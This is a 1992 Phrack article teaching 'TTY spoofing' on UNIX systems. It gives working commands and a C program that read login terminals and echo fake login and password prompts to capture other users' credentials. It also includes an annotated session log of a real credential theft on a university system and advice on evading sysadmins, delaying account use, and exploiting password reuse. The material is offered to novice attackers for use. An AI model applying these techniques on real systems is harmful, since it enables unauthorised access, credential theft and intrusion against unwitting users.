==Phrack Inc.== Volume Four, Issue Forty-One, File 8 of 13 ++++++++++++++++++++++++++++ +++++++ +++++++ +++++++ TTY SPOOFING +++++++ +++++++ +++++++ ++++++ BY ++++++ +++++ +++++ +++ VaxBuster +++ ++ ++ ++++++++++++++++++++++++++++ July 16, 1992 Please note that this file is ONLY to be distributed as part of Phrack, and will NOT be distributed to any other person or magazine for release. More detailed instructions have been provided so that the novice hacker is able to understand them; therefore, all experienced hackers should be able to breeze right through this without having to worry about the specific command syntax provided. On UNIX systems, there are many ways to obtain account names and passwords. Some hackers prefer to swipe the password file and run programs like Crack and Killer Cracker on them in order to get account names and passwords. Others rely on bugs or holes in the system in order to gain root access. Both these methods work, but what do you do if your password file is shadowed (and it is NOT a yellow pages file!)? And what do you do if all the holes have been patched over from years of previous hackers abusing them? Well, I happen to have found a system where all this is true. I have even allowed hackers to use one of my accounts to try to gain root privs, and of the 10 or so that have tried, they have all failed. My only recourse was to find SOME other way to get accounts on the system to maintain MY security. TTY spoofing is often looked at as being lame, and some don't even consider it a "hacking technique." People usually completely overlook it, and many others don't even know about it, or know HOW to do it. I suppose I should start out by defining the term. TTY spoofing is either installing a Trojan horse type program to sit and watch a certain (or multiple) tty and wait for a user to login. Instead of getting the normal system prompt, the program YOU installed echoes the standard "login:" prompt, and then after they type in their username, it prompts them for " password:" and boom, you have a new account. This can be done by a program or, in many cases, manually. Of all the people I know, 90 percent of them scream at me saying that this is impossible because their system doesn't allow read/write access to the tty. When I make references to tty, I mean the physical device filename or /dev/ttyxx where xx is either numeric, alphabetic, or alphanumeric characters (e.g., 03, pa, p4 are all valid). Of all the systems I've been on, I've never seen one that doesn't allow reading/writing to a LOGIN process. See, the system doesn't change the tty to owner r/w ONLY until AFTER HIS USERNAME AND PASSWORD HAS BEEN VERIFIED. Console, or ttyco, is an exception where the perms are ALWAYS -rw------. Now that you know WHAT tty spoofing is and the general idea behind WHY it works, I'll start to tell you the many ways it can be done. In order to tty spoof, you MUST have at least ONE valid account on the system. You can obtain the account via a little social engineering, or you could try a /who *sitename in the IRC to get nicknames and use their username and try to hack out the password. Try looking for users in #hottub and other st00pid channels because they are the ones who would tend to have the easy passwords. Or use any other method that you can think of to obtain an account. Once you have an account, the rest is the easy part. Simply create a script in vi or emacs that redirects input from UNUSED tty's to cat. Since you are cat's standard output, everything coming FROM the monitored tty will come to your screen. You probably want to watch about 10 or 15 terminals. An example script would be: cat /dev/tty01&'. The & is important because if the user decided to switch terminals, echo could lock up and freeze your control on the account. If after about 10 seconds echo doesn't come back as: [5] Exit DONE echo -n login: >/dev/tty01 KILL the process. When you ran the echo command, the shell gave you a processid. Just type KILL processid. If the done echo line DOES come back, that means that it was successfully printed on the user's screen. He will then type in his username. WRITE THIS DOWN. If you are ever in doubt that the word on your screen is a username, type 'grep word /etc/passwd' and if a line comes up, you know it's valid. If grep doesn't return anything, still keep it because it might be a password. Then wait about 2 seconds, and type 'echo -n " password:" >/dev/tty01&' again using the & to prevent lockage. If that command doesn't come back in about 10 seconds, kill the process off and you can assume that you lost the user (e.g. he moved to another terminal). If the done echo line DOES come back, then in about 2 seconds, you SHOULD see his password come up. If you do, write it down, and boom, you have a new account. This may seem like a time consuming process and a lot of work, but considering that if you have macros with the "cat FILE *fp, *fp2; char username[10], password[10]; main() { fp=fopen("/dev/ttyp1", "r"); fp2=fopen("/dev/ttyp1", "w"); fprintf(fp2, "login:"); fscanf(fp, "%s", &username); /* Put delay commands in here */ fprintf(fp2, "%s password:", username); fscanf(fp, "%s", @password); printf("Your new account info is %s, with password %s.", username, password); } This is a VERY basic setup. One could fairly easily have the program take arguments from the command line, like a range of tty's, and have the output sent to a file. Below is an actual session of manual tty spoofing. The usernames and passwords HAVE been changed because they will probably be active when you read this. Some c/r's and l/f's have been cut to save space. Please notice the time between the startup and getting a new account is only seven minutes. Using this technique does not limit the hacked passwords to dictionary derivatives like Crack and other programs. source mycats ; This file contains cats ; for terminals tty03 - tty10 [1] 29377 /dev/tty03: Permission denied ; All this means is that someone is logged in ; and has their mesg set to NO. Ignore it. [1] Exit 1 cat < /dev/tty03 [2] 29378 [3] 29379 /dev/tty06: Permission denied /dev/tty05: Permission denied [4] Exit 1 cat < /dev/tty06 [3] Exit 1 cat < /dev/tty05 /dev/tty07: Permission denied [3] Exit 1 cat < /dev/tty07 /dev/tty08: Permission denied [3] Exit 1 cat < /dev/tty08 [2] + Stopped (tty input) cat < /dev/tty04 ;This was the terminal I was ;on - it's automatically ;aborted... [3] 29383 <5:34pm><~> /dev/tty09: Permission denied [3] Exit 1 cat < /dev/tty09 <5:34pm><~> source mycats2 ;This one contains 34 - 43 [3] 29393 [4] 29394 [5] 29395 [6] 29396 [7] 29397 [8] 29398 [9] 29399 /dev/tty36: Permission denied /dev/tty37: Permission denied /dev/tty38: Permission denied /dev/tty39: Permission denied /dev/tty40: Permission denied /dev/tty34: Permission denied /dev/tty35: Permission denied [9] Exit 1 cat < /dev/tty40 [8] Exit 1 cat < /dev/tty39 [7] Exit 1 cat < /dev/tty38 [6] Exit 1 cat < /dev/tty37 [5] Exit 1 cat < /dev/tty36 [4] Exit 1 cat < /dev/tty35 [3] Exit 1 cat < /dev/tty34 [1] 29400 [3] 29401 [4] 29402 <5:34pm><~> /dev/tty41: Permission denied [1] Exit 1 cat < /dev/tty41 /dev/tty43: Permission denied [4] Exit 1 cat < /dev/tty43 /dev/tty42: Permission denied [3] Exit 1 cat < /dev/tty42 <5:34pm><~> source mycats3 ;This contains p1-pa [3] 29404 [4] 29405 [5] 29406 [6] 29407 [7] 29408 /dev/ttyp1: Permission denied /dev/ttyp3: Permission denied /dev/ttyp5: Permission denied /dev/ttyp6: Permission denied [8] Exit 1 cat < /dev/ttyp6 [7] Exit 1 cat < /dev/ttyp5 [5] Exit 1 cat < /dev/ttyp3 [3] Exit 1 cat < /dev/ttyp1 [7] 29410 [8] 29411 [9] 29412 [1] 29413 <5:34pm><~> /dev/ttyp7: Permission denied [7] Exit 1 cat < /dev/ttyp7 /dev/ttypa: Permission denied [1] Exit 1 cat < /dev/ttypa <5:34pm><~> source mycats4 ;Last one is q0-qa [1] 29426 [3] 29427 [5] 29428 [7] 29429 [10] 29430 [11] 29431 /dev/ttyq5: Permission denied [10] Exit 1 cat < /dev/ttyq5 [12] 29432 [10] 29433 [13] 29434 [14] 29435 <5:34pm><~> who <5:34pm><~> nnnnnnnnrlogin unx ; He thought he didn't type it right. pigsnort ; Important! Write down ALL non- ; system sent messages! <5:35pm><~> grep pigsnort /etc/passwd ; Check with grep to see if it's an ; account. <5:35pm><~> ; Didn't return anything - must be a ; a password! nnnpptst8 ; Sure looks like an account name to nnnnn===== ; me! Write it down! ls [8] Done cat < /dev/ttyp8 ; Asshole pressed control-d. ; 'recat' the terminal! <5:36pm><~> cat < /d e v/ ttyp8& ; This is the 'recat.' [8] 29459 <5:36pm><~> cat: read error: I/O error ; Asshole is now trying all ; sorts of control characters ; sending UNIX into a fit. [4] Exit 1 cat < /dev/ttyp2 <5:36pm><~> cat <~> <5:36pm><~> [6] Done cat < /dev/ttyp4 ; Someone had to press the ; character, so this is active. <5:36pm><~> cat <~> echo -n "login:" >/dev/ttyble1 ; Try echo'ing a fake login cat: read error: I/O error ; to the active terminal. [6] Exit 1 cat < /dev/ttyp4 poop4d ; Here goes another password. p4 ; Couldn't find the matching & ; account. [6] 29470 <5:37pm><~> cat: read error: I/O error [4] Exit 1 cat < /dev/ttyp2 <5:37pm><~> cat <~> echo -n "login:" >/dev/ttyp2& ; Try echo'ing a fake login ; prompt again. [15] 29490 <5:37pm><~> kill 29490 ; Login prompt didn't return ; within a few seconds so we ; kill it. [15] Terminated echo -n login: > /dev/ttyp2 <5:37pm><~> cat /dev/ttyp4& [15] 29491 <5:38pm><~> kill 29491 <5:38pm><~> grep pptst8 /etc/passwd ; Make sure it's an account! pptst8:X:58479:4129:People Eater:/ucuc.edu/usr/pptst8:/bin/bash <5:38pm><~> grep ble1 /etc/passwd ; This isn't an account... <5:39pm><~> grep poop4d /etc/passwd ; Neither is this - probably ; a password... <5:39pm><~> who ; See if any of the users we ; caught fell through an ; 'uncatted' terminal... <5:39pm><~> ps -x ; View all our processes. ; DAMN glad that the cat's PID TT STAT TIME COMMAND ; don't come up in the process 29266 04 S 0:04 -tcsh (tcsh) ; list! 29378 04 T 0:00 cat 29412 04 I 0:00 -tcsh (tcsh) 29426 04 I 0:00 -tcsh (tcsh) 29427 04 I 0:00 -tcsh (tcsh) 29428 04 I 0:00 -tcsh (tcsh) 29429 04 I 0:00 -tcsh (tcsh) 29431 04 I 0:00 -tcsh (tcsh) 29432 04 I 0:00 -tcsh (tcsh) 29433 04 I 0:00 -tcsh (tcsh) 29434 04 I 0:00 -tcsh (tcsh) 29435 04 I 0:00 -tcsh (tcsh) 29459 04 I 0:00 -tcsh (tcsh) 29470 04 D 0:00 29489 04 I 0:00 -tcsh (tcsh) 29491 04 D 0:00 -tcsh (tcsh) 29547 04 R 0:00 ps -x <5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29 435 29459 29470 29489 289491 ;Kill off all processes. 29470: No such process [4] Terminated cat < /dev/ttyp2 [8] Terminated cat < /dev/ttyp8 [14] Terminated cat < /dev/ttyqa [13] Terminated cat < /dev/ttyq9 [10] Terminated cat < /dev/ttyq8 [12] Terminated cat < /dev/ttyq7 [11] Terminated cat < /dev/ttyq6 [7] Terminated cat < /dev/ttyq4 [5] Terminated cat < /dev/ttyq3 [3] Terminated cat < /dev/ttyq2 [1] Terminated cat < /dev/ttyq1 [9] Terminated cat < /dev/ttyp9 [2] Terminated cat < /dev/tty04 <5:41pm><~> [15] Terminated echo -n login: > /dev/ttyp4 [6] Done echo -n login: > /dev/ttyp4 <5:41pm><~> ps -x PID TT STAT TIME COMMAND 29266 04 S 0:04 -tcsh (tcsh) 29594 04 R 0:00 ps -x <5:41pm><~> logout Local -011- Session 1 disconnected from UNIX1 Local> c unx ; Notice it's a different ; system but shares passwords. Local -010- Session 1 to UNX on node MYUNX established Welcome to ucuc.edu. login: ble1 ; Test out all the accounts ble1 password: [I tried poop4d] ; with all the passwords. Login failed. login: pptst8 pptst8 password: [I tried poop4d here too.] Login failed. login: pptst8 pptst8 password: [I typed pigsnort] Authenticated via AFS Kerberos. ; BINGO! We're in! Checking system rights for ... login permitted. login 1.0(2), Authen Last login: Fri Jul 17 17:33:30 on tty11 (1) unix $ ls ; Let's see what this sucker ; has...hmm...an IRC user, eh? Mail Mailbox News bin irc other junk private public (2) unix $ logout Local -011- Session 1 disconnected from UNX A few words of advice: Monitor the tty's when it's the busiest time of the day, usually about 11am on a university system. Kill all your processes before you hang up. Those processes that you run will sit on the system and can be found by sysadmins. Also, they will tie up those tty's that you are monitoring, which can also cause problems. Point is, you DON'T want to attract attention to what you're doing. Don't test the accounts you get immediately. If the victim happens to be doing a 'who' and sees two of himself, he is going to shit. Wait until later or use a different subsystem that won't show up on his 'who'. Don't take over accounts. All the real user has to do is call up the office and tell them that their password was changed. In two seconds, it'll be changed back, plus the sysadmin will be on the lookout so you're just one step BEHIND where you started. Once you have someone's account info, kill the cat that is sucking the terminal so that the user can log in normally. If he continues not to get ANYTHING, he may go and solicit some "professional" help, and THEY might know what's going on, so let the sucker log in. Another thing: with accounts you get. DO NOT DESTROY ANYTHING in the system, not in their account, and no where else if you get higher privs. Chances are that the person is NOT going to know someone has obtained their password, and will have NO reason to change it. Wait until his college term/semester ends and then monitor the file dates. If after about a month the dates don't change, change the password and do whatever you want to the account because he's probably done with it. Oh and one last thing. Once you have a valid account, grep the username and get the REAL name. Then grep the REAL name and find out all accounts on the system that the guy owns. Chances are that he is using the same password in multiple accounts! Thanks go to Pointman, #hack members, and the entire current/past Phrack staff for putting out an excellent magazine over the years. If you need to contact me, try the IRC in #hack and the VMB world. I usually prefer NOT to be contacted by e-mail, but if you have my address and have an important question, go for it. I'm willing to help any beginners who need it. Happy Hacking! VaxBuster '92 _______________________________________________________________________________